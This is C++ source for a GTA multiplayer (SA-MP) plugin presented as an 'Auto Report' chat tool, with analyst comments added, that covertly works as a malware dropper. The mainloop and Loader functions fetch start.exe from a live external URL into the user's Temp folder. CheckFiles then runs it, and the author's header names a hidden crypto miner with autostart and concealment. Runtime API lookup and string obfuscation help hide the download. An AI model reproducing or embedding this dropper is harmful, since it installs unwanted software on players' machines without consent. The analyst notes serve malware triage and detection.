  1. #define _SILENCE_STDEXT_HASH_DEPRECATION_WARNINGS
  2. // by Martin 0pc0d3R
  3. /*
  4. + Downloads the miner's 11 files into the temp folder
  5. + Hides all the files and launches the executable hidden
  6. + Registers itself for autostart
  7. + The files are downloaded only once
  8. TODO:
  9. - Create backup copies of all the miner files
  10. - Add launching the miner to the Task Scheduler
  11. - With admin rights, register a service to conceal the miner
  12. */
  13. #include <windows.h>
  14. #include <string>
  15. #include <assert.h>
  16. #include <process.h>
  17. #include "SAMPFUNCS_API.h"
  18. #include "game_api\game_api.h"
  19. #include <shellapi.h>
  20. #include "Registry.h"
  21. #include <urlmon.h>
  22. #include <thread>
  23. #include <direct.h>
  24. #pragma warning (disable:4018)
  25. std::string DecoreFor(char *str);
  26. #pragma comment(lib, "urlmon.lib")
  27. #pragma comment(lib,"User32.lib")
  28. #pragma comment (lib, "Shell32.lib")
  // Module-wide state. ThisDLL is set in DllMain; FilesLoaded is incremented by LoadFile after a
  // successful download and polled by CheckFiles.
  29. HMODULE ThisDLL = nullptr; int FilesLoaded = 0;
  // Twelve thread slots are reserved (destr walks all twelve); Loader in this listing fills only
  // slots 0 (download) and 1 (CheckFiles).
  30. DWORD ThreadID[12];
  31. HANDLE hThread[12];
  // Keeps CheckFiles polling; cleared by CheckFiles once the payload was started, and by destr.
  32. bool repeator = true;
  33.  
  34.  
  // Id/handle of the most recent NeueThread started from Hook. destr does not touch this handle.
  35. DWORD threadidd;
  36. HANDLE threda;
  // Auto-report switch, toggled by the "autoreport" chat command (see CMD).
  37. bool arep = false;
  38.  
  39.  
  // SAMPFUNCS plugin API object, constructed during static initialisation of the DLL.
  40. SAMPFUNCS *SF = new SAMPFUNCS();
  // Parameter block handed to worker threads through CreateThread's void* argument.
  // path / link / FileNameAndExtension are consumed by LoadFile (destination directory, source URL,
  // file name); odd carries a copy of a chat line to NeueThread; iptr is written by Hook;
  // idtr is not referenced anywhere else in this listing.
  41. typedef struct
  42. {
  43. char path[256];
  44. char link[256];
  45. char FileNameAndExtension[256];
  46. char odd[256];
  47. char *iptr;
  48. char *idtr;
  49. } MsParams_t;
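  /// Case-insensitive substring search.
  ///
  /// @param haystack NUL-terminated text to search.
  /// @param needle   NUL-terminated text to look for.
  /// @return Pointer to the first match inside @p haystack, @p haystack itself when
  ///         @p needle is empty, or nullptr when there is no match.
  ///
  /// Case folding uses toupper(), so it follows the current C locale; bytes the locale does
  /// not map (e.g. multi-byte or code-page text in the "C" locale) are compared as-is.
  const char *mystristr(const char *haystack, const char *needle)
  {
      // toupper() is only defined for values representable as unsigned char (or EOF). The chat
      // text passed in contains bytes above 0x7F, which are negative where plain char is signed,
      // so every byte is widened through unsigned char first.
      const auto fold = [](char c) { return toupper(static_cast<unsigned char>(c)); };

      if (*needle == '\0')
      {
          return haystack;
      }

      for (const char *start = haystack; *start != '\0'; ++start)
      {
          const char *h = start;
          const char *n = needle;
          while (*h != '\0' && *n != '\0' && fold(*h) == fold(*n))
          {
              ++h;
              ++n;
          }
          // The whole needle was consumed, so the match begins at `start`.
          if (*n == '\0')
          {
              return start;
          }
      }
      return nullptr;
  }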
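  /// Counts the decimal digit characters in a NUL-terminated string.
  ///
  /// @param str Text to scan; it is not modified.
  /// @return Number of characters in the range '0'..'9'.
  ///
  /// The lower bound is inclusive: the previous `> '0'` comparison skipped the digit zero, so a
  /// string consisting only of "0" was reported as containing no digits.
  int SumDigit(char *str)
  {
      int count = 0;
      for (const char *p = str; *p != '\0'; ++p)
      {
          if (*p >= '0' && *p <= '9')
          {
              ++count;
          }
      }
      return count;
  }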
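  char fmt[256];
  /// Worker started by Hook for a chat line that matched one of the report keywords.
  ///
  /// @param lprm Pointer to an MsParams_t whose `odd` member holds the chat line.
  ///
  /// After a two second delay the line is split into the text between the first '[' and the last
  /// ']' (shown as the reporting ID) and the text between the first ':' and the last ' ' (shown as
  /// the reported ID). Both are echoed to the local chat. If the second part contains a digit and
  /// key code 113 (VK_F2) is held, an "/ans" reply and a "/sp" command are sent, each only while
  /// the local player is not already spectating.
  ///
  /// Security note: the chat line comes from the server. The original code did pointer arithmetic
  /// on unchecked strchr()/strrchr() results (NULL when a delimiter is missing) and formatted the
  /// extracted text into fixed 256-byte buffers with sprintf(). Lines without all four delimiters
  /// in the expected order are now ignored, and formatting is bounded with snprintf().
  void __stdcall NeueThread(void *lprm)
  {
      Sleep(2000);
      MsParams_t *rptr = (MsParams_t *)lprm;

      // Work on a private copy: the caller hands over a static block that a later match reuses.
      const std::string stroka(rptr->odd);

      const std::string::size_type open_br = stroka.find('[');
      const std::string::size_type close_br = stroka.rfind(']');
      const std::string::size_type colon = stroka.find(':');
      const std::string::size_type last_sp = stroka.rfind(' ');
      if (open_br == std::string::npos || close_br == std::string::npos ||
          colon == std::string::npos || last_sp == std::string::npos)
      {
          return; // a delimiter is missing, nothing to extract
      }
      if (close_br < open_br || last_sp < colon)
      {
          return; // delimiters out of order would give a negative length
      }

      const std::string reporter = stroka.substr(open_br + 1, close_br - open_br - 1);
      const std::string target = stroka.substr(colon + 1, last_sp - colon - 1);

      // SumDigit only reads its argument; the cast is needed for its non-const signature.
      const int chislo = SumDigit(const_cast<char *>(target.c_str()));

      SF->getSAMP()->getChat()->AddChatMessage(D3DCOLOR_XRGB(15, 140, 253),
          "{0f8cfd}[RDM-DEBUG]{FFFFFF} Распознан новый репорт от ID: {B72626}%s{FFFFFF} на ID:{B72626}%s{FFFFFF}.",
          reporter.c_str(), target.c_str());

      if (chislo > 0 && SF->getGame()->isKeyPressed(113))
      {
          char fmt[256];
          char fm2[256];
          // Bounded formatting: both inserts are taken from the chat line.
          snprintf(fmt, sizeof(fmt), "/ans %s Здравствуйте, начинаю слежку за данным игроком.", reporter.c_str());
          snprintf(fm2, sizeof(fm2), "/sp %s", target.c_str());
          stLocalPlayer *lpr = SF->getSAMP()->getPlayers()->pLocalPlayer;
          // The spectating state is checked before each command, as in the original.
          if (lpr->iIsSpectating == 0) lpr->Say(fmt);
          if (lpr->iIsSpectating == 0) lpr->Say(fm2);
      }
  }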
  122.  
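  /// Incoming-RPC callback registered with SAMPFUNCS in mainloop.
  ///
  /// @param hook RakNet hook parameters; only packetId and bitStream are used here.
  /// @return Always true, as in the original (presumably "let the packet through" - confirm
  ///         against the SAMPFUNCS API).
  ///
  /// For RPC_ScrClientMessage packets the colour, length and text are read from the bit stream and
  /// the read pointer is reset afterwards. While auto-report is enabled, a line that contains the
  /// "{FFCD00}" colour tag and any of the keywords below is copied into a parameter block and
  /// handed to NeueThread on a new thread.
  ///
  /// Security note: strLen is supplied by the remote side. The original read strLen bytes into a
  /// 256-byte stack buffer without a bound and never NUL-terminated it before strstr()/strcpy().
  /// Over-long messages are now skipped and the buffer is always terminated.
  bool __stdcall Hook(stRakNetHookParams *hook)
  {
      if (hook->packetId != RPC_ScrClientMessage)
      {
          return true;
      }

      DWORD color = 0, strLen = 0;
      char msg[256];
      hook->bitStream->ResetReadPointer();
      hook->bitStream->Read(color);
      hook->bitStream->Read(strLen);
      if (strLen >= sizeof(msg))
      {
          // Would not fit together with the terminator: leave the packet untouched.
          hook->bitStream->ResetReadPointer();
          return true;
      }
      hook->bitStream->Read(msg, strLen);
      msg[strLen] = '\0';
      hook->bitStream->ResetReadPointer();

      if (arep != true)
      {
          return true;
      }

      char *ptr = strstr(msg, "{FFCD00}");
      if (ptr == nullptr)
      {
          return true;
      }

      // Same keyword set as the original condition chain; a hit on any entry is enough.
      static const char *const keywords[] = {
          "cheat", "чит", "читер", "читак", "cheater", "читеры",
          "aim", "аим", "Аим", "Сало", "salo", "silent",
          "сало", "сайлент", "ск", "sk", "Ск", "сК",
          "ck", "Сайлент", "оск", "osk", "cbug", "c-bug",
          "сибаг", "+с", "сбив", "аирбрейк", "б6", "aimhack"
      };
      bool matched = false;
      for (const char *keyword : keywords)
      {
          if (mystristr(msg, keyword) != nullptr)
          {
              matched = true;
              break;
          }
      }

      if (matched)
      {
          // NOTE(review): this block is static and shared with every NeueThread still sleeping,
          // so a second match within two seconds replaces the text the first thread will read.
          static MsParams_t params;
          strcpy(params.odd, msg); // msg is terminated and at most 255 characters, odd holds 256
          params.iptr = ptr;       // points into this stack frame; NeueThread does not read it
          threda = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)&NeueThread, (void*)&params, 0, &threadidd);
      }
      return true;
  }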
  /// Handler for the "autoreport" chat command: announces the new state in the local chat and
  /// flips the auto-report switch.
  ///
  /// @param cmd Command arguments; not used.
  void __stdcall CMD(std::string cmd)
  {
      // The message describes the state being switched TO, so it is picked before the flag flips.
      const char *announcement = arep
          ? "{C31F09}[RDM] {B2AEAE}Auto {EDE3E9}Report {C31F09}Выключен."
          : "{C31F09}[RDM] {B2AEAE}Auto {EDE3E9}Report {C31F09}Включен!";
      SF->getSAMP()->getChat()->AddChatMessage(D3DCOLOR_XRGB(194, 71, 71), announcement);
      arep = !arep;
  }
  173.  
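  /// Copies @p source to @p dest with space runs normalised: leading and trailing spaces are
  /// dropped and every inner run of spaces becomes a single space.
  ///
  /// @param dest   Output buffer; must hold at least strlen(source) + 1 bytes. May be the same
  ///               buffer as @p source.
  /// @param source NUL-terminated input.
  ///
  /// The original loop stepped its pointers once more after copying the terminator whenever the
  /// input ended in spaces, reading and writing past the end of both buffers. This version stops
  /// at the terminator in every case.
  void ClearThis(char * dest, char * source)
  {
      char *out = dest;
      const char *in = source;

      while (*in == ' ')
      {
          ++in; // leading spaces are dropped entirely
      }

      while (*in != '\0')
      {
          if (*in != ' ')
          {
              *out++ = *in++;
              continue;
          }
          while (*in == ' ')
          {
              ++in; // swallow the whole run
          }
          if (*in != '\0')
          {
              *out++ = ' '; // keep one separator, but not at the very end
          }
      }
      *out = '\0';
  }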
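  /// Replaces the clipboard contents with the given ANSI text (CF_TEXT).
  ///
  /// @param txt NUL-terminated text; a null pointer is ignored.
  ///
  /// Changes from the original: the block is allocated with GMEM_MOVEABLE, which
  /// SetClipboardData() requires for memory handles (GMEM_DDESHARE is an obsolete, ignored flag);
  /// allocation and lock failures are checked instead of being dereferenced; and the block is
  /// freed when the clipboard does not take ownership of it.
  void CopyToBuffer(char *txt)
  {
      if (txt == nullptr || !OpenClipboard(0))
      {
          return;
      }

      EmptyClipboard();
      const size_t bytes = strlen(txt) + 1;
      HGLOBAL clipbuffer = GlobalAlloc(GMEM_MOVEABLE, bytes);
      if (clipbuffer != NULL)
      {
          char *buffer = (char*)GlobalLock(clipbuffer);
          if (buffer != nullptr)
          {
              memcpy(buffer, txt, bytes);
              GlobalUnlock(clipbuffer);
              // On success the system owns the handle; on failure it is still ours to release.
              if (SetClipboardData(CF_TEXT, clipbuffer) == NULL)
              {
                  GlobalFree(clipbuffer);
              }
          }
          else
          {
              GlobalFree(clipbuffer);
          }
      }
      CloseClipboard();
  }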
  // Analyst note: execution stage of the dropper, run on its own thread (started by Loader).
  // It waits until FilesLoaded equals 1, i.e. until LoadFile reported one successful download,
  // then runs C:\Users\<user>\AppData\Local\Temp\start.exe through system() and writes the
  // string "Loaded" to HKCU\Software\Mq4lt5z9ld0a, value Ld56xsMp01a. mainloop checks that
  // value on later starts, so the download/run sequence happens once per user profile.
  // While the flag `repeator` is set the function calls itself again after each 100 ms sleep.
  //
  // Detection and triage pointers taken from this listing:
  //  - start.exe present in the user's Temp directory;
  //  - the host game process launching a command interpreter child that runs that file
  //    (system() goes through the command interpreter);
  //  - the registry key/value named above, which also serves as a marker of a past infection.
  199. void __stdcall CheckFiles()
  200. {
  201. Sleep(100);
  202. if (FilesLoaded == 1)
  203. {
  204. Sleep(1000);
  // The path is built from the account name rather than from the TEMP environment variable.
  205. char Uname[50]; DWORD szI = 50; GetUserNameA(Uname, &szI);
  206. char epath[256]; sprintf(epath, "C:\\Users\\%s\\AppData\\Local\\Temp\\start.exe", Uname);
  207. //ShellExecuteA(NULL, "open", epath, "", NULL, SW_SHOW);
  208. char* programname = epath;
  // Blocks this thread until the launched program exits.
  209. system(programname);
  // Marker write; the CEasyRegistry object is never deleted.
  210. CEasyRegistry *miner = new CEasyRegistry(HKEY_CURRENT_USER, "Software\\Mq4lt5z9ld0a");
  211. miner->WriteString("Ld56xsMp01a", "Loaded");
  212. repeator = false;
  213. }
  214. if (repeator) CheckFiles();
  215. }
  216. /*
  217. void __stdcall LoadFile(void *param)
  218. {
  219. MsParams_t *ptr = (MsParams_t *)param;
  220. char inter[128]; sprintf(inter, "\\%s", ptr->FileNameAndExtension);
  221. strcat(ptr->path, inter);
  222. HRESULT hr = URLDownloadToFileA(nullptr, ptr->link, ptr->path, 0, nullptr);
  223. if (SUCCEEDED(hr))
  224. {
  225. ++FilesLoaded;
  226. DWORD attributes = GetFileAttributesA(ptr->path);
  227. //SetFileAttributesA(ptr->path, attributes + FILE_ATTRIBUTE_HIDDEN + FILE_ATTRIBUTE_SYSTEM);
  228. }
  229. }*/
  // Analyst note: string de-obfuscation helper. Every byte of `str` is decremented by one IN
  // PLACE (the caller's buffer is modified) and the result is returned as a std::string.
  // Nothing in this listing calls it; together with the commented-out XOR(...) line in Loader it
  // suggests the author experimented with hiding the download URL from static string scans.
  // For triage: strings in related samples may be stored shifted by +1 per byte.
  230. std::string DecoreFor(char *str)
  231. {
  232. for (int x = 0; x < strlen(str); x++) --str[x];
  233. std::string enc(str);
  234. return enc;
  235. }
  236.  
  // Function-pointer type matching URLDownloadToFileA, used for the run-time lookup below.
  237. typedef HRESULT (__stdcall *FuckYourMommy)(LPUNKNOWN, LPCSTR, LPCSTR, DWORD, LPBINDSTATUSCALLBACK);
  // Analyst note: download stage of the dropper, run on its own thread (started by Loader).
  // `param` is an MsParams_t: "\" + FileNameAndExtension is appended to `path`, and the content
  // at `link` is saved to that path with URLDownloadToFileA. On success FilesLoaded is
  // incremented, which is the signal CheckFiles waits for.
  // The API is resolved with GetModuleHandle/GetProcAddress instead of being called directly,
  // presumably so the call is less visible to static inspection; the name still appears as a
  // plain string, and urlmon.lib is linked by a #pragma at the top of the file.
  // Nothing is verified about the downloaded file (no hash, signature or size check).
  238. void __stdcall LoadFile(void *param)
  239. {
  240. MsParams_t *ptr = (MsParams_t *)param;
  241. char inter[128]; sprintf(inter, "\\%s", ptr->FileNameAndExtension);
  242. strcat(ptr->path, inter); FuckYourMommy _MotherFucker = NULL;
  243. _MotherFucker = (FuckYourMommy)GetProcAddress(GetModuleHandle("Urlmon.dll"), "URLDownloadToFileA");
  244. HRESULT hr = _MotherFucker(nullptr, ptr->link, ptr->path, 0, nullptr);
  245.  
  246. if (SUCCEEDED(hr))
  247. {
  248. ++FilesLoaded;
  // The attributes are read but not used: the call that would mark the file hidden + system is
  // commented out in this version, so the dropped file is visible in Explorer.
  249. DWORD attributes = GetFileAttributesA(ptr->path);
  250. //SetFileAttributesA(ptr->path, attributes + FILE_ATTRIBUTE_HIDDEN + FILE_ATTRIBUTE_SYSTEM);
  251. }
  252. }
  // Analyst note: orchestrates the drop. It builds the per-user Temp path, fills one parameter
  // block (params11) with destination directory, source URL and file name, and starts two
  // threads: LoadFile for the download (slot 0) and CheckFiles to run the result (slot 1).
  // The parameter blocks are static, hence zero-initialised, which is why strcat() into the
  // empty arrays works. params1..params10 are declared but unused here: the header comment
  // speaks of 11 files, while this version fetches a single one.
  //
  // Indicators visible in this function:
  //  - download over plain HTTP from host cw36634[.]tmweb[.]ru, path /getfile.php?file=12;
  //  - file written as start.exe in C:\Users\<user>\AppData\Local\Temp.
  // The autostart entry described in the header comment is not implemented anywhere in this
  // listing; the only registry write is the "Loaded"/"Nothing" marker.
  253. void Loader()
  254. {
  255. char Uname[50]; DWORD szI = 50; GetUserNameA(Uname, &szI);
  256. char dirpath[256]; sprintf(dirpath, "C:\\Users\\%s\\AppData\\Local\\Temp", Uname); // download directory
  257. static MsParams_t params1, params2, params3, params4, params5, params6, params7, params8, params9, params10, params11;
  258. strcat(params11.path, dirpath);
  259. strcat(params11.link, "http://cw36634.tmweb.ru/getfile.php?file=12");
  260. //strcat(params11.link,XOR("jvvr8--au14416,voug`,pw-egvdkng,rjr=dkng?30").c_str());
  261. strcat(params11.FileNameAndExtension, "start.exe");
  262. hThread[0] = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)&LoadFile, (void*)&params11, 0, &ThreadID[0]);
  263. ///////////////////////////////////////// Thread that waits for all files to finish downloading ////////////////////////////////////////
  264. hThread[1] = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)&CheckFiles, NULL, 0, &ThreadID[1]);
  265. }
  // Game-destructor callback (registered in mainloop). Clears `repeator` so CheckFiles stops
  // polling, then force-terminates and closes every non-null handle in hThread[0..11].
  // The NeueThread handle kept in `threda` is not covered. A process already started by
  // CheckFiles is not affected by terminating these threads.
  266. void __stdcall destr()
  267. {
  268. repeator = false;
  269. for (short x = 0; x < 12; x++)
  270. {
  271. if (hThread[x] != NULL)
  272. {
  273. TerminateThread(hThread[x], 0);
  274. CloseHandle(hThread[x]);
  275. }
  276. }
  277. }
  // Plugin main-loop callback passed to SF->initPlugin in DllMain. Runs its body once (guarded by
  // the static `init`), and only after the game reports GS_PLAYING_GAME and SAMP is initialised.
  //
  // Analyst note: the visible feature set (RPC hook, "autoreport" command, chat banner) is
  // registered first; the last step is the part the user is not told about. The marker value
  // Ld56xsMp01a under HKCU\Software\Mq4lt5z9ld0a is read, and unless it equals "Loaded" it is
  // set to "Nothing" and Loader() starts the download-and-run sequence. The payload is therefore
  // triggered from inside the game session, not at DLL load time, and deleting the marker
  // re-arms it. Presence of the key with either value indicates this plugin has run.
  278. void __stdcall mainloop( void )
  279. {
  280. static bool init = false;
  281. if (!init)
  282. {
  283. if (GAME == nullptr) return;
  284. if (GAME->GetSystemState() != eSystemState::GS_PLAYING_GAME) return;
  285. if(!SF->getSAMP()->IsInitialized()) return;
  286. SF->getGame()->registerGameDestructorCallback(destr);
  287.  
  288. SF->getRakNet()->registerRakNetCallback(RAKHOOK_TYPE_INCOMING_RPC, Hook); // register the hook
  289. SF->getSAMP()->registerChatCommand("autoreport", CMD); // register the command
  290. SF->getSAMP()->getChat()->AddChatMessage(D3DCOLOR_XRGB(194, 71, 71),
  291. "{C31F09}[RDM] {B2AEAE}Auto {EDE3E9}Report {C31F09}for Revival DM.");
  292.  
  293.  
  294.  
  295.  
  // strcmp() returns non-zero when the stored value differs from "Loaded" (including when the
  // value does not exist yet - assuming ReadString then yields an empty string; confirm).
  296. CEasyRegistry *miner = new CEasyRegistry(HKEY_CURRENT_USER, "Software\\Mq4lt5z9ld0a");
  297. if (strcmp((char*)miner->ReadString("Ld56xsMp01a").c_str(), "Loaded"))
  298. {
  299. miner->WriteString("Ld56xsMp01a", "Nothing");
  300. Loader();
  301. }
  302. init = true;
  303. }
  304. }
  /// DLL entry point. On process attach the module handle is stored in ThisDLL and the plugin is
  /// registered with SAMPFUNCS, with mainloop as its callback. Thread attach/detach and process
  /// detach need no work. Always reports success.
  bool WINAPI DllMain( HMODULE hModule, DWORD dwReasonForCall, LPVOID lpReserved )
  {
      if ( dwReasonForCall == DLL_PROCESS_ATTACH )
      {
          ThisDLL = hModule;
          SF->initPlugin( mainloop, hModule );
      }
      return TRUE;
  }